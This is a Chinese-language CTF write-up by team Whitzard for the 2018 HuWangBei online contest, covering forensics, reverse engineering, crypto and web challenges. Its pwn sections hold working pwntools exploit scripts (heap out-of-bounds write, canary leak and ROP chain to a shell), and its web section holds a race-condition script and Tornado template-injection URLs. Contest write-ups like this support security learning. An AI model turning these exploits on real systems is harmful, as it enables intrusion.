2018护网杯线上赛 Writeup by Whitzard
HuWang2018 Whitzard
MISC
签到题
脑洞题,不想去猜key,就暴力了一下:
import base64
res = ''
a = "AAoHAR1TIiIkUFUjUFQgVyInVSVQJVFRUSNRX1YgXiJSVyJQVRs="
a = base64.b64decode(a)
for i in range(128):
for j in a:
res+=chr(i^ord(j))
print res
Easy dump
题目给了一个600M的镜像,是取证题
直接用volatility的imageinfo查看镜像,发现是windows内存镜像,并且可以看到版本信息
>>>python vol.py -f ./easy_dump.img imageinfo
Volatility Foundation Volatility Framework 2.6
INFO : volatility.debug : Determining profile based on KDBG search...
Suggested Profile(s) : Win7SP1x64, Win7SP0x64, Win2008R2SP0x64, Win2008R2SP1x64_24000, Win2008R2SP1x64_23418, Win2008R2SP1x64, Win7SP1x64_24000, Win7SP1x64_23418
AS Layer1 : WindowsAMD64PagedMemory (Kernel AS)
AS Layer2 : FileAddressSpace (/home/blackmax/download/volatility/easy_dump.img)
PAE type : No PAE
DTB : 0x187000L
KDBG : 0xf80004006070L
Number of Processors : 1
Image Type (Service Pack) : 0
KPCR for CPU 0 : 0xfffff80004007d00L
KUSER_SHARED_DATA : 0xfffff78000000000L
Image date and time : 2018-09-30 05:30:17 UTC+0000
Image local date and time : 2018-09-30 13:30:17 +0800
volatility提供很多查看当时系统状态信息的指令,我们先用pslist查看当时的进程,发现有个explorer,notepad等常被用来出题的进程,这里只列出这些,实际还有其他一些程序
0xfffffa80083f4060 notepad.exe 2952 1260 1 57 1 0 2018-09-30 05:18:25 UTC+0000
0xfffffa80083ea9f0 dllhost.exe 2740 612 10 197 1 0 2018-09-30 05:30:14 UTC+0000
0xfffffa800a1a2b30 DumpIt.exe 2256 1260 2 43 1 1 2018-09-30 05:30:16 UTC+0000
0xfffffa8009b1fb30 conhost.exe 2964 396 2 57 1 0 2018-09-30 05:30:16 UTC+0000
0xfffffa8009e03630 explorer.exe 1260 1172 34 953 1 0 2018-09-30 05:17:34 UTC常见的情况会在notepad里开着一个文档藏一些和flag相关的信息,但是这题尝试查看notepad并没有发现一些有用的信息。再尝试从其他程序入手。volatility中对于windows下的程序有很多插件,比如iehistoty插件,可以很方便的查看ie浏览器的浏览记录。
>>>python vol.py -f ./easy_dump.img --profile=Win7SP1x64 iehistory
Volatility Foundation Volatility Framework 2.6
**************************************************
Process: 1260 explorer.exe
Cache type "URL " at 0x4235000
Record length: 0x100
Location: :2018093020181001: n3k0@file:///C:/phos.jpg
Last modified: 2018-09-30 13:19:21 UTC+0000
Last accessed: 2018-09-30 05:19:21 UTC+0000
File Offset: 0x100, Data Offset: 0x0, Data Length: 0x0
**************************************************
Process: 1260 explorer.exe
Cache type "URL " at 0x4235100
Record length: 0x100
Location: :2018093020181001: n3k0@:Host: ?????????
Last modified: 2018-09-30 12:43:38 UTC+0000
Last accessed: 2018-09-30 04:43:38 UTC+0000
File Offset: 0x100, Data Offset: 0x0, Data Length: 0x0
**************************************************
Process: 1260 explorer.exe
Cache type "URL " at 0x4235200
Record length: 0x100
Location: :2018093020181001: n3k0@file:///C:/phos.jpg
Last modified: 2018-09-30 13:30:14 UTC+0000
Last accessed: 2018-09-30 05:30:14 UTC+0000
File Offset: 0x100, Data Offset: 0x0, Data Length: 0x0
**************************************************
这里多条浏览记录都指向本地的一张叫phos.jpg的图片。说明这张图片应该有重要信息。我们接下来要想办法dump这张图片。
volatility同样有提供dump文件的插件,用filescan扫描一下文件列表,找到了这张jpg
0x00000000235bec20 12 0 R--r-- \Device\HarddiskVolume1\Windows\SysWOW64\kernel32.dll
0x00000000235c8770 32 0 RW---- \Device\HarddiskVolume1\phos.jpg
0x00000000235c91c0 15 1 R--r-d \Device\HarddiskVolume1\Windows\System32\en-US\KernelBase.dll.mui
0x00000000235c95b0 2 0 RW-rwd \Device\HarddiskVolume1\$Directory
记下偏移0x00000000235c8770,使用dumpfiles把这张图片dump出来
python vol.py -f ./easy_dump.img --profile=Win7SP1x64 dumpfiles -Q 0x00000000235c8770 --name -D ~/CTF/HWB
图片打开并没有直接显示flag相关的信息,猜测是jpg隐写,先用010editor打开发现藏了一个zip压缩包,可以手动提取也可以直接用binwalk提取这个zip。
解压之后里面有个message.img镜像,先strings一下,得到一堆数据和一个奇怪的字符串yispn!buwh_qcfd_ebo_mglzs。看起来是个加密后的flag
file message.img可以看到是linux下的filesystem data。使用mount指令挂载之后查看里面的hint.txt文件。文件中有很多数据,第二个数几乎都是从10-269递增,然后第一位数增1,同样第一位也是从10一直增到269.但仔细查看就会发现,中间有不连续的数据存在
29 190
29 191
29 192
29 193
29 194
29 195
29 196
29 197
29 208
29 209
29 210
29 211
29 212
29 224
根据提示,txt的数据数量大约为两个相同的数相乘,这容易联想到是个二维码,存在和不存在的数据代表二维码上的黑点和白点
脚本如下:
#include <iostream>
#include <bits/stdc++.h>
using namespace std;
bool mp[275][275];
int main()
{
freopen("./hint.txt","r",stdin);
freopen("./out2.txt","w",stdout);
memset(mp,0,sizeof(mp));
int x, y;
while (scanf("%d%d",&x,&y)!= EOF){
mp[x][y]=true;
}
for (int i = 0; i < 270; i++){
for (int j = 0; j < 270; ++j){
if (mp[i][j]){
printf(" ");//白色像素
}
else printf("#");//黑色像素
}
printf("\n");
}
return 0;
}
直接以文本形式绘出二维码,把字体调的很小之后就可以看出是二维码了。扫码得到维吉尼亚的密码aeolus,解密得到flag。
PWN
task_gettingStart
这题有一个overflow的漏洞,只要将v8覆盖成0.1就能执行system("/bin/sh")了查一下浮点数的表示就行了
if ( v7 != 0x7FFFFFFFFFFFFFFFLL || v8 != 0.1 )
{
puts("Try again!");
}
else
{
printf("HuWangBei CTF 2018 will be getting start after %g seconds...\n", &buf, v8);
system("/bin/sh");
}payload如下:
payload=p64(0)+p64(0xa39)+p64(0)+p64(0x7fffffffffffffff)+p64(0x3FB999999999999A)cart
越界任意地址写。
from pwn import *
code = ELF('./task_shoppingCart', checksec=False)
context.arch = code.arch
context.log_level = 'debug'
def add(size, name):
r.sendlineafter('buy!\n', '1')
r.sendlineafter('?\n', str(size))
if size > 0:
r.sendafter('?\n', flat(name))
def fre(idx):
r.sendlineafter('buy!\n', '2')
r.sendlineafter('?\n', str(idx))
def edit(idx, payload):
r.sendlineafter('buy!\n', '3')
r.sendlineafter('?\n', str(idx))
r.sendafter('?\n', flat(payload))
def make_money():
r.sendlineafter('!\n', '1')
r.sendlineafter('?\n', 'AAAAAAA')
def login():
for i in range(20):
make_money()
r.sendlineafter('man!\n', '3')
def exploit(r):
login()
add(1000, 'qwe')
add(1000, 'sh\x00')
fre(0)
add(0, '')
r.sendlineafter('buy!\n', '3')
r.sendlineafter('?\n', str(2))
r.recvuntil('OK, what would you like to modify ')
tmp = r.recvline()[:6]
assert tmp[-1] == '\x7f'
libc.address = u64(tmp + '\0\0') - libc.sym['__malloc_hook'] - 0x448
info('%016x libc.address', libc.address)
r.sendline('qwe')
edit(-1, libc.address+0x3c3ef8)
edit(-21, libc.sym['system'])
fre(1)
r.sendlineafter('$ ', 'cd /tmp')
r.sendlineafter('$ ', 'cat << EOF > x.b64')
r.sendline(read('./x').encode('base64'))
r.sendline('EOF')
r.interactive()
huwang (赛后)
先设置round=-1进行交互,程序会循环MD5,此时文件内容为空;另开一个再交互,MD5即为16个NULL的MD5。
name填0x19个字符即可泄漏canary,occupation也塞满,然后栈溢出。
from pwn import *
code = ELF('./huwang', checksec=False)
context.arch = code.arch
context.log_level = 'debug'
def exploit(r):
name = 'A'*0x19
r.sendlineafter('>> \n', '666')
r.sendafter('\n', name)
r.sendlineafter('\n', 'y')
r.sendlineafter('\n', '1')
r.sendafter('\n', 'J\xe7\x136\xe4K\xf9\xbfy\xd2u.#H\x18\xa5')
r.sendafter('?', 'a'*0xff)
r.recvuntil('AAAAAAAAAAAAAAAAAAAAAAAAA')
canary = u64('\0' + r.recv(7))
info('%016x canary', canary)
r.sendlineafter('[Y/N]\n', 'Y')
pop_rdi_ret = gadget('pop rdi; ret')
leave_ret = gadget('leave; ret')
buf = 0x603800
r.send(flat(
'A'*0x108,
canary,
buf,
pop_rdi_ret, code.got['read'],
code.plt['puts'],
make_rop([0x401550, 0x40156A], code.got['read'], [0, buf, 0x100], rbp=buf),
leave_ret,
))
r.recvline()
tmp = r.recvline().strip() + '\0\0'
libc.address = u64(tmp) - libc.sym['read']
r.send(flat(
0,
pop_rdi_ret, libc.search('/bin/sh').next(),
libc.sym['system'],
))
r.interactive()
RE
RERERE
搜索字符串找到main函数,发现很多函数都是用通过一个函数表调用的。
依次查看调用的几个函数,从sub_401530函数中可以看出明显的VM特征,而之前读取的unk_404018即为VM代码。
因为VM代码较长,将每个指令的作用还原后,我们用python写了个parser来翻译:
import struct
p=0
def out(x):
print str(p)+ ' '+x
s=open('vm','rb').read()
f = struct.Struct('>I')
ss=''
hashp=0
while p < len(s):
if s[p] == 'P':
out('reg' + str(ord(s[p+1]) >> 4) + '++')
p += 2
elif s[p] == 'N':
out('reg' + str(ord(s[p+1]) >> 4) + '--')
p += 2
elif s[p] == 'G':
out('reg' + str(ord(s[p+1]) >> 4) + ' ^= reg'+ str(ord(s[p+1])&0xF) )
p += 2
elif s[p] == 'Y':
out('reg' + str(ord(s[p+1]) >> 4) + ' -= reg'+ str(ord(s[p+1])&0xF) )
p += 2
elif s[p] == 'J':
out('reg' + str(ord(s[p+1]) >> 4) + ' &= reg'+ str(ord(s[p+1])&0xF) )
p += 2
elif s[p] == 'S':
out('reg' + str(ord(s[p+1]) >> 4) + ' += reg'+ str(ord(s[p+1])&0xF) )
p += 2
elif s[p] == 'X':
out('reg' + str(ord(s[p+1]) >> 4) + ' *= reg'+ str(ord(s[p+1])&0xF) )
p += 2
elif s[p] == 'O':
out('mem = ' + (s[p+1:p+5]).encode('hex') )
if((f.unpack(s[p+1:p+5])[0]) > 1000):
ss+=(s[p+1:p+5]).encode('hex')
p += 5
elif s[p] == 'T':
out('reg' + str(ord(s[p+1]) >> 4) + ' = mem')
p += 2
elif s[p] == 'Q':
out('reg' + str(ord(s[p+1]) >> 4) + ' = reg'+ str(ord(s[p+1])&0xF) )
p += 2
elif s[p] == 'F':
out('reg' + str(ord(s[p+1]) >> 4) + ' = hash[hashp]')
p += 2
elif s[p] == 'U':
out('rep reg3 ' + str(p-ord(s[p+1])) )
p += 2
elif s[p] == 'H':
out('cmp reg' + str(ord(s[p+1]) >> 4) + ' reg'+str(ord(s[p+1])&0xF) )
p += 2
elif s[p] == 'D':
out('jl ' + str(p+2+ord(s[p+1])) )
p += 2
elif s[p] == 'M':
out('jg ' + str(p+2+ord(s[p+1])) )
p += 2
elif s[p] == 'K':
out('jz ' + str(p+2+ord(s[p+1])) )
p += 2
elif s[p] == 'I':
hashp+=1
out('hashp++')
p += 1
elif s[p] == 'V':
hashp-=1
out('hashp--')
p += 1
elif s[p] == 'C':
out('exit' )
p += 1
else:
out(s[p])
p += 1
print ss[::-1].upper()
翻译后的结果:
0 mem = 47
5 rep reg3 0
7 reg3 = mem
9 reg0 = hash[hashp]
11 reg2 ^= reg2
13 cmp reg0 reg2
15 jz 68
17 hashp++
18 mem = 70
23 reg1 = mem
25 cmp reg0 reg1
27 jg 68
29 mem = 48
34 reg1 = mem
36 cmp reg0 reg1
38 jl 62
40 mem = 57
45 reg1 = mem
47 cmp reg0 reg1
49 jl 62
51 mem = 65
56 reg0 = mem
58 cmp reg0 reg1
60 jl 68
62 reg0 ^= reg0
64 cmp reg0 reg0
66 jz 73
68 reg0 ^= reg0
70 reg0++
72 exit
73 rep reg3 9
75 mem = 7
80 reg3 = mem
82 reg1 = 0
84 hashp--
85 reg0 = hash[hashp]
87 mem = 48
92 reg2 = mem
94 reg0 -= reg2
96 mem = 10
101 reg2 = mem
103 cmp reg0 reg2
105 jl 116
107 mem = 7
112 reg2 = mem
114 reg0 -= reg2
116 mem = 16
121 reg2 = mem
123 reg1 *= reg2
125 reg1 += reg0
127 rep reg3 84
129 mem = 3954878541
134 reg2 = mem
136 cmp reg1 reg2
138 reg0 ^= reg0
140 jz 145
142 reg0++
144 exit
145 mem = 7
150 reg3 = mem
152 reg1 ^= reg1
154 hashp--
155 reg0 = hash[hashp]
157 mem = 48
162 reg2 = mem
164 reg0 -= reg2
166 mem = 10
171 reg2 = mem
173 cmp reg0 reg2
175 jl 186
177 mem = 7
182 reg2 = mem
184 reg0 -= reg2
186 mem = 16
191 reg2 = mem
193 reg1 *= reg2
195 reg1 += reg0
197 rep reg3 154
199 mem = 1406938271
204 reg2 = mem
206 cmp reg1 reg2
208 reg0 ^= reg0
210 jz 215
212 reg0++
214 exit
215 mem = 7
220 reg3 = mem
222 reg1 ^= reg1
224 hashp--
225 reg0 = hash[hashp]
227 mem = 48
232 reg2 = mem
234 reg0 -= reg2
236 mem = 10
241 reg2 = mem
243 cmp reg0 reg2
245 jl 256
247 mem = 7
252 reg2 = mem
254 reg0 -= reg2
256 mem = 16
261 reg2 = mem
263 reg1 *= reg2
265 reg1 += reg0
267 rep reg3 224
269 mem = 1858824029
274 reg2 = mem
276 cmp reg1 reg2
278 reg0 ^= reg0
280 jz 285
282 reg0++
284 exit
285 mem = 7
290 reg3 = mem
292 reg1 ^= reg1
294 hashp--
295 reg0 = hash[hashp]
297 mem = 48
302 reg2 = mem
304 reg0 -= reg2
306 mem = 10
311 reg2 = mem
313 cmp reg0 reg2
315 jl 326
317 mem = 7
322 reg2 = mem
324 reg0 -= reg2
326 mem = 16
331 reg2 = mem
333 reg1 *= reg2
335 reg1 += reg0
337 rep reg3 294
339 mem = 2143952328
344 reg2 = mem
346 cmp reg1 reg2
348 reg0 ^= reg0
350 jz 355
352 reg0++
354 exit
355 mem = 7
360 reg3 = mem
362 reg1 ^= reg1
364 hashp--
365 reg0 = hash[hashp]
367 mem = 48
372 reg2 = mem
374 reg0 -= reg2
376 mem = 10
381 reg2 = mem
383 cmp reg0 reg2
385 jl 396
387 mem = 7
392 reg2 = mem
394 reg0 -= reg2
396 mem = 16
401 reg2 = mem
403 reg1 *= reg2
405 reg1 += reg0
407 rep reg3 364
409 mem = 2386147433
414 reg2 = mem
416 cmp reg1 reg2
418 reg0 ^= reg0
420 jz 425
422 reg0++
424 exit
425 mem = 7
430 reg3 = mem
432 reg1 ^= reg1
434 hashp--
435 reg0 = hash[hashp]
437 mem = 48
442 reg2 = mem
444 reg0 -= reg2
446 mem = 10
451 reg2 = mem
453 cmp reg0 reg2
455 jl 466
457 mem = 7
462 reg2 = mem
464 reg0 -= reg2
466 mem = 16
471 reg2 = mem
473 reg1 *= reg2
475 reg1 += reg0
477 rep reg3 434
479 mem = 2597864506
484 reg2 = mem
486 cmp reg1 reg2
488 reg0 ^= reg0
490 jz 494
492 reg0++
494 exit开始的一段代码判断了hash的字符在数字和大写字母'A'-'F'内。
然后后面有四段非常相似的代码,每段代码均从hash的结尾开始取8个十六进制字符,转为十进制,最后与一个4字节的int进行比较。
将这四个用来比较的int拿出来,反向连接起来即可得到flag。
附上vm中用到的struct:
00000000 obj struc ; (sizeof=0x28, mappedto_35)
00000000 func_p dd ?
00000004 reg0 dd ?
00000008 reg1 dd ?
0000000C reg2 dd ?
00000010 reg3 dd ? ; offset
00000014 reg4 dd ?
00000018 hash dd ? ; offset
0000001C field_1C dd ?
00000020 mem dd ? ; offset
00000024 vmcode dd ? ; offset
00000028 obj endsCRYPTO
fez
fez的本质就是一些异或操作,虽然不知道密钥,但是我们有两段密文和其中的一段明文,密文与密文异或可以消去密钥,再异或明文就可以得到另一段明文
具体脚本如下
import os
def xor(a,b):
assert len(a)==len(b)
c=""
for i in range(len(a)):
c+=chr(ord(a[i])^ord(b[i]))
return c
def f(x,k):
return xor(xor(x,k),7)
def round(M,K):
L=M[0:27]
R=M[27:54]
new_l=R
new_r=xor(xor(R,L),K)
return new_l+new_r
def deround(M,K):
L=M[0:27]
R=M[27:54]
new_l=L
new_r=xor(xor(R,L),K)
return new_r+new_l
def fez(m,K):
for i in K:
m=round(m,i)
return m
def defez(m,K):
for i in reversed(K):
m=deround(m,i)
return m
K=[]
for i in range(7):
K.append(os.urandom(27))
m=open("flag","rb").read()
assert len(m)<54
m+=os.urandom(54-len(m))
test=os.urandom(54)
print test.encode("hex")
print fez(test,K).encode("hex")
print fez(m,K).encode("hex")
test="6e8a78be3a7c92f74db065a6a18cc659de4278f24af163c435853c06d2a0adeb49859c78dccdf8c85e5ed8cda7e22d6f098e6b1e4142"
a1="944360ff8ecd3a4d66b27dfcf7d9c1b5d22f53a9eb84edd29d2a4cc851abea669afaef060b5d1241338f92546a97d1d7ce00fa7b5e3e"
a2="a0a9f3660de9c2e347a141054548088827c481868b86473fc590aaf45d21aaa4a4f5c51ecd6812254be19d20f50b3aa24fa0bc7316dc"
a1=a1.decode("hex")
a2=a2.decode("hex")
test=test.decode("hex")
ss=xor(xor(a1[:27],a2[:27]),test[27:])
st=xor(xor(xor(xor(a1[27:],a2[27:]),test[27:]),test[:27]),ss)
print st+ssWPA2
是一个WPA2协议的题目
WPA2采用的是CMMP加密
题目给出了psk,mac和nounce根据这些信息我们可以得到加密的密钥。
后来主办方又给出了源代码,通过阅读代码,我们可以了解到跟多关于加密的细节。根据代码我们可以先进行解包,从网络包中得到真正的密文部分,然后用密钥进行解密即可。然后把解出的值提交给服务器即可。
代码如下:
from WPA2 import *
def DecryptCCMP(indata,TK):
if len(TK) != 16:
return None
is_a4 = 0
is_qos = 1
z = 24 + 6 * (1 if is_a4 else 0)
z += 2 * (1 if is_qos else 0)
inputpkt=indata.decode("hex")[:34]
PN=inputpkt[-8:-6]+inputpkt[-4:]
PN=PN[::-1]
data_len=33
B0 = ''
B0 += '\x59'
B0 += '\x00'
B0 += inputpkt[10:16]
B0 += PN
B0 += chr((data_len >> 8) & 0xFF)
B0 += chr(data_len & 0xFF)
AAD = '\x00' * 2 # [0] [1]
AAD += chr(ord(inputpkt[0]) & 0x8F) # [2]
AAD += chr(ord(inputpkt[1]) & 0xC7) # [3]
AAD += inputpkt[4:4 + 3 * 6] # [4]..[21]
AAD += chr(ord(inputpkt[22]) & 0x0F) # [22]
AAD += '\x00' # [23]
if (is_a4):
AAD += inputpkt[24:24 + 6] # [24]..[29]
if (is_qos):
AAD += chr(ord(inputpkt[z - 2]) & 0x0F) # [30]
AAD += '\x00' # [31]
tmp = list(B0)
tmp[1] = AAD[30]
B0 = ''.join(tmp)
tmp = list(AAD)
tmp[1] = chr(22 + 2 + 6)
AAD = ''.join(tmp)
else:
AAD += '\x00' * 2 # [30]..[31]
tmp = list(B0)
tmp[1] = '\x00'
B0 = ''.join(tmp)
tmp = list(AAD)
tmp[1] = chr(22 + 6)
AAD = ''.join(tmp)
else:
if (is_qos):
AAD += chr(ord(inputpkt[z - 2]) & 0x0F) # [24]
AAD += '\x00' # [25]
tmp = list(B0)
tmp[1] = AAD[24]
B0 = ''.join(tmp)
tmp = list(AAD)
tmp[1] = chr(22 + 2)
AAD = ''.join(tmp)
else:
AAD += '\x00' * 2 # [24]..[25]
tmp = list(B0)
tmp[1] = '\x00'
B0 = ''.join(tmp)
tmp = list(AAD)
tmp[1] = chr(22)
AAD = ''.join(tmp)
AAD += '\x00' * 6
cipher = AES.new(TK, AES.MODE_ECB)
MIC = cipher.encrypt(B0)
MIC = XOR(MIC, AAD, 16)
MIC = cipher.encrypt(MIC)
MIC = XOR(MIC, AAD[16:], 16)
MIC = cipher.encrypt(MIC)
tmp = list(B0)
tmp[0] = chr(ord(tmp[0]) & 0x07)
tmp[14] = '\x00'
tmp[15] = '\x00'
B0 = ''.join(tmp)
B = cipher.encrypt(B0)
initMIC = B
offset =34
blocks = 3
last = 1
print "TK"
print repr(TK)
print "B0"
print repr(B0)
decryptedPacket = indata.decode("hex")
plain=""
for i in range(1, blocks + 1):
n = last if (last > 0 and i == blocks) else 16
tmp = list(B0)
tmp[14] = chr((i >> 8) & 0xFF)
tmp[15] = chr(i & 0xFF)
B0 = ''.join(tmp)
B = cipher.encrypt(B0)
print repr(B)
out = XOR(decryptedPacket[offset:offset + n], B, n)
plain += out
offset += n
return plain
ssid="HuWang"
psk="HSrObIZmBx6inYc2"
aNonce="482d8d5f601ca1b671ab9cbdc30ad998b880168ccb3c26d6d7ed3cfc8149045a".decode("hex")
sNonce="4fbbb10c26f7376867f29db85c189ae2c7b0e4023f5af3e9a73cae9c97b46cb1".decode("hex")
apMac="47:C4:47:16:E8:7D"
staMac="7F:57:0A:12:66:5B"
apMac=apMac.replace(":","").lower().decode("hex")
staMac=staMac.replace(":","").lower().decode("hex")
A,B = MakeAB(aNonce,sNonce,apMac,staMac)
ptk,pmk = MakeKeys(psk,ssid,A,B)
key = ptk[-16:]
cipher="88423a017f570a12665b47c44716e87d47c44716e87d609200005f85002096000000a6690951247f1faacc65af2069bf567a78c2aac8423d351a72510b001529121bf40be946e2ad07af00"
print DecryptCCMP(cipher,key)其中CMMP的相关代码:
#!/usr/bin/env python
import hmac
from hashlib import pbkdf2_hmac,sha1,md5
from Crypto.Cipher import AES
import string
import random
import struct
def PRF(key,A,B):
nByte = 48
i = 0
R = ''
while ( i <= ((nByte*8 + 159)/160)):
hmacsha1 = hmac.new(key,A+"\x00" + B + chr(i),sha1)
R += hmacsha1.digest()
i += 1
return R[0:nByte]
def MakeAB(aNonce,sNonce,apMac,cliMac):
A = "Pairwise key expansion"
B = min(apMac,cliMac) + max(apMac,cliMac) + min(aNonce, sNonce) + max(aNonce, sNonce)
return (A,B)
def MakeKeys(pwd,ssid,A,B):
pmk = pbkdf2_hmac('sha1',pwd,ssid,4096,32)
ptk = PRF(pmk,A,B)
return (ptk,pmk)
def XOR(b1,b2,l):
if (len(b1)<l or len(b2)<l):
return None
res = ''
for i in range(l):
res += chr(ord(b1[i]) ^ ord(b2[i]))
if (len(b1)>l):
res += b1[l:]
return res
def EncryptCCMP(indata,TK,PN):
if len(TK) != 16 or len(PN) != 6:
return None
is_a4 = (ord(indata[1]) & 0x03) == 3
is_qos = (ord(indata[0]) & 0x8c) == 0x88
z = 24 + 6 * (1 if is_a4 else 0)
z += 2 * (1 if is_qos else 0)
h80211 = list(indata)
h80211[z + 0] = PN[5]
h80211[z + 1] = PN[4]
h80211[z + 2] = '\x00'
h80211[z + 3] = '\x20'
h80211[z + 4] = PN[3]
h80211[z + 5] = PN[2]
h80211[z + 6] = PN[1]
h80211[z + 7] = PN[0]
inputpkt = ''.join(h80211)
data_len=33
B0 = ''
B0 += '\x59'
B0 += '\x00'
B0 += inputpkt[10:16]
B0 += PN
B0 += chr((data_len >> 8) & 0xFF)
B0 += chr(data_len & 0xFF)
AAD = '\x00' * 2 # [0] [1]
AAD += chr(ord(inputpkt[0]) & 0x8F) # [2]
AAD += chr(ord(inputpkt[1]) & 0xC7) # [3]
AAD += inputpkt[4:4 + 3 * 6] # [4]..[21]
AAD += chr(ord(inputpkt[22]) & 0x0F) # [22]
AAD += '\x00' # [23]
if (is_a4):
AAD += inputpkt[24:24 + 6] # [24]..[29]
if (is_qos):
AAD += chr(ord(inputpkt[z - 2]) & 0x0F) # [30]
AAD += '\x00' # [31]
tmp = list(B0)
tmp[1] = AAD[30]
B0 = ''.join(tmp)
tmp = list(AAD)
tmp[1] = chr(22 + 2 + 6)
AAD = ''.join(tmp)
else:
AAD += '\x00' * 2 # [30]..[31]
tmp = list(B0)
tmp[1] = '\x00'
B0 = ''.join(tmp)
tmp = list(AAD)
tmp[1] = chr(22 + 6)
AAD = ''.join(tmp)
else:
if (is_qos):
AAD += chr(ord(inputpkt[z - 2]) & 0x0F) # [24]
AAD += '\x00' # [25]
tmp = list(B0)
tmp[1] = AAD[24]
B0 = ''.join(tmp)
tmp = list(AAD)
tmp[1] = chr(22 + 2)
AAD = ''.join(tmp)
else:
AAD += '\x00' * 2 # [24]..[25]
tmp = list(B0)
tmp[1] = '\x00'
B0 = ''.join(tmp)
tmp = list(AAD)
tmp[1] = chr(22)
AAD = ''.join(tmp)
AAD += '\x00' * 6
cipher = AES.new(TK, AES.MODE_ECB)
MIC = cipher.encrypt(B0)
MIC = XOR(MIC, AAD, 16)
MIC = cipher.encrypt(MIC)
MIC = XOR(MIC, AAD[16:], 16)
MIC = cipher.encrypt(MIC)
tmp = list(B0)
tmp[0] = chr(ord(tmp[0]) & 0x07)
tmp[14] = '\x00'
tmp[15] = '\x00'
B0 = ''.join(tmp)
B = cipher.encrypt(B0)
initMIC = B
blocks = (data_len + 16 - 1) / 16
last = data_len % 16
offset = z + 8
encryptedPacket = ''
print offset
print last
print blocks
for i in range(1, blocks + 1):
n = last if (last > 0 and i == blocks) else 16
MIC = XOR(MIC,inputpkt[offset:offset+n],n)
MIC = cipher.encrypt(MIC)
tmp = list(B0)
tmp[14] = chr((i >> 8) & 0xFF)
tmp[15] = chr(i & 0xFF)
B0 = ''.join(tmp)
B = cipher.encrypt(B0)
out = XOR(inputpkt[offset:offset + n], B, n)
encryptedPacket += out
offset += n
print len(encryptedPacket)
encryptedPacket = inputpkt[:z+8] + encryptedPacket
encryptedPacket += XOR(initMIC,MIC,8)[:8]
return encryptedPacket
if __name__=="__main__":
print "Welcome to HuWang Bei WPA2 Simulation System.. Initilizing Parameters.."
print ""
ssid = "HuWang"
psk = ''.join(random.choice(string.ascii_uppercase+ string.ascii_lowercase + string.digits) for _ in range(16))
rnddev = open("/dev/urandom","rb")
aNonce = rnddev.read(32)
sNonce = rnddev.read(32)
apMac = rnddev.read(6)
staMac = rnddev.read(6)
rnddev.close()
print "SSID = "+ssid
print ""
print "PSK = "+psk
print ""
outmac=apMac.encode('hex').upper()
macaddr = ''
for i in range(len(outmac)):
macaddr += outmac[i]
if (i%2!=0 and i<len(outmac)-1):
macaddr+=':'
print "AP_MAC = "+macaddr
print ""
print "AP_Nonce = "+aNonce.encode('hex')
print ""
outmac=staMac.encode('hex').upper()
macaddr = ''
for i in range(len(outmac)):
macaddr += outmac[i]
if (i%2!=0 and i<len(outmac)-1):
macaddr+=':'
print "STA_MAC = "+macaddr
print ""
print "STA_Nonce = "+sNonce.encode('hex')
print ""
A,B = MakeAB(aNonce,sNonce,apMac,staMac)
ptk,pmk = MakeKeys(psk,ssid,A,B)
key = ptk[-16:]
#chlvalue = ''.join(random.choice(string.ascii_uppercase+ string.ascii_lowercase + string.digits) for _ in range(16))
chlvalue="a"*16
challenge = "Challenge Vlaue: "+chlvalue
datapkt = ("88423a01"+staMac.encode('hex')+apMac.encode('hex')+apMac.encode('hex')+"60920000"+"0000002000000000"+challenge.encode('hex')).decode('hex')
packetNumber = struct.pack(">Q",random.randint(1,9999999))[2:]
print repr(datapkt)
print repr(key)
print repr(packetNumber)
outtoUser = EncryptCCMP(datapkt,key,packetNumber)
print repr(outtoUser)
print "CCMP Encrypted Packet = "+outtoUser.encode("hex")
print ""
exit()
userinput = raw_input("Input decrypted challenge value in Packet:")
print ""
if (userinput == chlvalue):
f = open("flag","r")
content = f.read()
f.close()
print "Congratulations!Your flag is: "+content
else:
print "Wrong!"WEB
LTSHOP
本题的考点在于条件竞争以及整数的溢出问题
通过多线程发包的方式使得购买到 5 个以上的大辣条
import requests
import threading
url = "http://49.4.79.236:30189/"
s = requests.Session()
def post(querystring):
headers = {
'Cookie': "go_iris_cookie=93542bfe-f8e2-4e4e-ba4c-1b0c5c739342;",
'Content-Type': "application/x-www-form-urlencoded"
}
response = s.post(url+querystring, headers=headers)
print(response.text)
def main():
l = []
for i in range(1000):
l.append(threading.Thread(target=post, args=('buylt',)))
for t in l:
t.start()
for t in l:
t.join()
if __name__ == '__main__':
main()
此时我们可以得到超过 5 个以上的大辣条,但远远买不到足够的辣条之王
此时我们观察到我们可以控制批量购买的数量,不同数量的反馈是不同的,比如我购买 2 个,提醒的是大辣条数量不足,而购买 -1 个或者 99999999999999999999 则是数量非法,所以我们可以猜测题目使用 uint64 作为变量的类型。
可以推测题目的逻辑如下:
var num uint
if num * 5 <= 大辣条数目 {
辣条之王 += num
}
很明显存在着乘法上溢问题,如果我们构造 num = 3689348814741910324,经过测试可得 num * 5 = 4,4 <= 5 成立
i = 2**64 // 5 + 1 # 3689348814741910324
j = i * 5 % 2 ** 64 # 4
所以我们即可利用 4 个大辣条买到近乎无限的辣条之王(具体为 3689348814741910324 个),即可顺利购买 flag
easy tornado
进入题目
http://49.4.78.81:30980/发现意思很明确,有签名,读文件
发现
http://49.4.78.81:30980/error?msg={{1^0}}可模板注入,但过滤了非常多的符号,应该只能读个变量
发现handler.settings存放了cookie_secret
读取
http://49.4.78.81:30980/error?msg={{handler.settings}}随机构造签名读flag
http://49.4.78.81:30980/file?filename=/fllllllllllag&signature=7bae09c2c6e2f6aa34df7dbee23db960得到
flag{67a3d3dec827645c1c92d1f2160c744f}
转载
分享
0 条评论
可输入 255 字
发布投稿
